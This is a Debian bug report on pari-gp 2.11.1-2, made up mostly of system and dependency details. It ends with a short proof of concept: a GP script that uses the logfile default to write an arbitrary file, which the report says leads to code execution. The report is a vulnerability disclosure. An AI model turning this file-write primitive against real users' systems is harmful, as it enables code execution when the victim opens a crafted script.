Package: pari-gp
Version: 2.11.1-2
Severity: normal
Tags: security
-- System Information:
Debian Release: 10.2
APT prefers stable-updates
APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)
Kernel: Linux 4.19.0-6-amd64 (SMP w/1 CPU core)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8),
LANGUAGE=en_US:en (charmap=UTF-8)
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled
Versions of packages pari-gp depends on:
ii libc6 2.28-10
ii libgmp10 2:6.1.2+dfsg-4
ii libreadline7 7.0-5
ii libx11-6 2:1.6.7-1
Versions of packages pari-gp recommends:
ii pari-doc 2.11.1-2
ii pari-elldata 0.20161017-1
ii pari-galdata 0.20080411-2
ii pari-seadata 0.20090618-1
Versions of packages pari-gp suggests:
pn pari-galpol <none>
pn pari-gp2c <none>
-- no debconf information
pari/gp is CAS (computer algebra system).
pari/gp version 2.9.1 on debian stretch and 2.11 on debian buster
allow arbitrary file write and hence arbitrary code execution.
poc:
========
\\ a.gp
\\ to run: \r a.gp
default("logfile","/tmp/a.txt");default("log",1);print("log(1)");
========
